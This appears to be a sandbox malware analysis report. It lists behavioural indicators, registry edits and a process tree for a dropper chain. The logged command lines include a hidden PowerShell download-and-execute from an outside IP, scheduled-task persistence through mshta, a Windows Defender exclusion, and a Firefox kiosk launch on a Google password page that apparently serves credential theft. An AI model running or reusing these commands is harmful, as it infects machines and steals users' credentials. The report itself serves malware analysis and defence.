1dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4f7305716b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 32d42439b0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 32d42439b0.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2340 schtasks.exe 1544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 2168 rapes.exe 3032 powershell.exe 3032 powershell.exe 3032 powershell.exe 2452 TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE 2424 powershell.exe 1572 powershell.exe 1944 powershell.exe 1664 powershell.exe 2988 CnVf3x0mxd.exe 1664 powershell.exe 1664 powershell.exe 2704 483d2fa8a0d53818306efeb32d3.exe 1096 5af08d2768.exe 2692 d52ccaca11.exe 2304 32d42439b0.exe 2032 4f7305716b.exe 2304 32d42439b0.exe 2304 32d42439b0.exe 2304 32d42439b0.exe 2304 32d42439b0.exe 2032 4f7305716b.exe 2032 4f7305716b.exe 2032 4f7305716b.exe 2032 4f7305716b.exe 1444 ce4pMzk.exe 1444 ce4pMzk.exe 1444 ce4pMzk.exe 1444 ce4pMzk.exe 2068 70b73e7ec3.exe 2336 0f27b08ee4.exe 1772 49f4ed094b.exe 980 ce0fdbb4c7.exe 1772 49f4ed094b.exe 980 ce0fdbb4c7.exe 980 ce0fdbb4c7.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe 3692 BSVOQewEKZ.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 2988 CnVf3x0mxd.exe Token: SeDebugPrivilege 1132 7817fe6500.exe Token: SeDebugPrivilege 1444 ce4pMzk.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeDebugPrivilege 2228 taskkill.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 692 taskkill.exe Token: SeDebugPrivilege 1108 firefox.exe Token: SeDebugPrivilege 1108 firefox.exe Token: SeDebugPrivilege 980 ce0fdbb4c7.exe Token: SeDebugPrivilege 3692 BSVOQewEKZ.exe Token: SeDebugPrivilege 3212 powershell.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 896 b2a880b369.exe 896 b2a880b369.exe 896 b2a880b369.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1108 firefox.exe 1108 firefox.exe 1108 firefox.exe 1108 firefox.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 896 b2a880b369.exe 896 b2a880b369.exe 896 b2a880b369.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1108 firefox.exe 1108 firefox.exe 1108 firefox.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe 1772 49f4ed094b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2596 wrote to memory of 2168 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 30 PID 2596 wrote to memory of 2168 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 30 PID 2596 wrote to memory of 2168 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 30 PID 2596 wrote to memory of 2168 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 30 PID 2168 wrote to memory of 896 2168 rapes.exe 32 PID 2168 wrote to memory of 896 2168 rapes.exe 32 PID 2168 wrote to memory of 896 2168 rapes.exe 32 PID 2168 wrote to memory of 896 2168 rapes.exe 32 PID 896 wrote to memory of 2692 896 b2a880b369.exe 33 PID 896 wrote to memory of 2692 896 b2a880b369.exe 33 PID 896 wrote to memory of 2692 896 b2a880b369.exe 33 PID 896 wrote to memory of 2692 896 b2a880b369.exe 33 PID 896 wrote to memory of 3028 896 b2a880b369.exe 34 PID 896 wrote to memory of 3028 896 b2a880b369.exe 34 PID 896 wrote to memory of 3028 896 b2a880b369.exe 34 PID 896 wrote to memory of 3028 896 b2a880b369.exe 34 PID 2692 wrote to memory of 2340 2692 cmd.exe 36 PID 2692 wrote to memory of 2340 2692 cmd.exe 36 PID 2692 wrote to memory of 2340 2692 cmd.exe 36 PID 2692 wrote to memory of 2340 2692 cmd.exe 36 PID 3028 wrote to memory of 3032 3028 mshta.exe 37 PID 3028 wrote to memory of 3032 3028 mshta.exe 37 PID 3028 wrote to memory of 3032 3028 mshta.exe 37 PID 3028 wrote to memory of 3032 3028 mshta.exe 37 PID 2168 wrote to memory of 2292 2168 rapes.exe 39 PID 2168 wrote to memory of 2292 2168 rapes.exe 39 PID 2168 wrote to memory of 2292 2168 rapes.exe 39 PID 2168 wrote to memory of 2292 2168 rapes.exe 39 PID 2292 wrote to memory of 2200 2292 cmd.exe 41 PID 2292 wrote to memory of 2200 2292 cmd.exe 41 PID 2292 wrote to memory of 2200 2292 cmd.exe 41 PID 2292 wrote to memory of 2200 2292 cmd.exe 41 PID 3032 wrote to memory of 2452 3032 powershell.exe 42 PID 3032 wrote to memory of 2452 3032 powershell.exe 42 PID 3032 wrote to memory of 2452 3032 powershell.exe 42 PID 3032 wrote to memory of 2452 3032 powershell.exe 42 PID 2292 wrote to memory of 2124 2292 cmd.exe 43 PID 2292 wrote to memory of 2124 2292 cmd.exe 43 PID 2292 wrote to memory of 2124 2292 cmd.exe 43 PID 2292 wrote to memory of 2124 2292 cmd.exe 43 PID 2124 wrote to memory of 2424 2124 cmd.exe 44 PID 2124 wrote to memory of 2424 2124 cmd.exe 44 PID 2124 wrote to memory of 2424 2124 cmd.exe 44 PID 2124 wrote to memory of 2424 2124 cmd.exe 44 PID 2292 wrote to memory of 236 2292 cmd.exe 45 PID 2292 wrote to memory of 236 2292 cmd.exe 45 PID 2292 wrote to memory of 236 2292 cmd.exe 45 PID 2292 wrote to memory of 236 2292 cmd.exe 45 PID 236 wrote to memory of 1572 236 cmd.exe 46 PID 236 wrote to memory of 1572 236 cmd.exe 46 PID 236 wrote to memory of 1572 236 cmd.exe 46 PID 236 wrote to memory of 1572 236 cmd.exe 46 PID 2292 wrote to memory of 776 2292 cmd.exe 47 PID 2292 wrote to memory of 776 2292 cmd.exe 47 PID 2292 wrote to memory of 776 2292 cmd.exe 47 PID 2292 wrote to memory of 776 2292 cmd.exe 47 PID 776 wrote to memory of 1944 776 cmd.exe 64 PID 776 wrote to memory of 1944 776 cmd.exe 64 PID 776 wrote to memory of 1944 776 cmd.exe 64 PID 776 wrote to memory of 1944 776 cmd.exe 64 PID 2292 wrote to memory of 1544 2292 cmd.exe 49 PID 2292 wrote to memory of 1544 2292 cmd.exe 49 PID 2292 wrote to memory of 1544 2292 cmd.exe 49 PID 2292 wrote to memory of 1544 2292 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe"C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Users\Admin\AppData\Local\Temp\10104610101\b2a880b369.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\b2a880b369.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn RQTGumaNuEt /tr "mshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn RQTGumaNuEt /tr "mshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2340
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE"C:\Users\Admin\AppData\Local\TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2452
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "cWGp4maewvd" /tr "mshta \"C:\Temp\wsUzR7ZEx.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1544
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\wsUzR7ZEx.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Users\Admin\AppData\Roaming\dw4I35Ut3X.exe"C:\Users\Admin\AppData\Roaming\dw4I35Ut3X.exe"5⤵
- Executes dropped EXE
PID:2960
-
-
C:\Users\Admin\AppData\Roaming\CnVf3x0mxd.exe"C:\Users\Admin\AppData\Roaming\CnVf3x0mxd.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2988 -s 15806⤵PID:2484
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104850101\5af08d2768.exe"C:\Users\Admin\AppData\Local\Temp\10104850101\5af08d2768.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1096 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2240
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 10125⤵
- Loads dropped DLL
- Program crash
PID:664
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 5164⤵
- Loads dropped DLL
- Program crash
PID:2288
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104870101\d52ccaca11.exe"C:\Users\Admin\AppData\Local\Temp\10104870101\d52ccaca11.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2692 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104880101\32d42439b0.exe"C:\Users\Admin\AppData\Local\Temp\10104880101\32d42439b0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\10104890101\4f7305716b.exe"C:\Users\Admin\AppData\Local\Temp\10104890101\4f7305716b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xYYgnj9o\Anubis.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104920101\70b73e7ec3.exe"C:\Users\Admin\AppData\Local\Temp\10104920101\70b73e7ec3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 12284⤵
- Loads dropped DLL
- Program crash
PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104930101\0f27b08ee4.exe"C:\Users\Admin\AppData\Local\Temp\10104930101\0f27b08ee4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\10104940101\49f4ed094b.exe"C:\Users\Admin\AppData\Local\Temp\10104940101\49f4ed094b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1772 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2716
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1108 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.0.541618555\606097230" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1248 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53047677-781b-4a33-906c-33dc77728a43} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 1320 fafa458 gpu6⤵PID:1456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.1.1549847346\180608095" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2d07c34-f0fb-4157-af44-97a8877bccfc} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 1528 43eca58 socket6⤵PID:704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.2.96235492\933566631" -childID 1 -isForBrowser -prefsHandle 2132 -prefMapHandle 1864 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78492c6f-e0b0-46d1-a8b6-6cdf69e401aa} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 2076 190c2258 tab6⤵PID:1312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.3.1124784581\301159656" -childID 2 -isForBrowser -prefsHandle 2824 -prefMapHandle 2820 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85e79fe2-932a-4930-9120-76acc677477a} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 2836 1c506258 tab6⤵PID:928
-
-
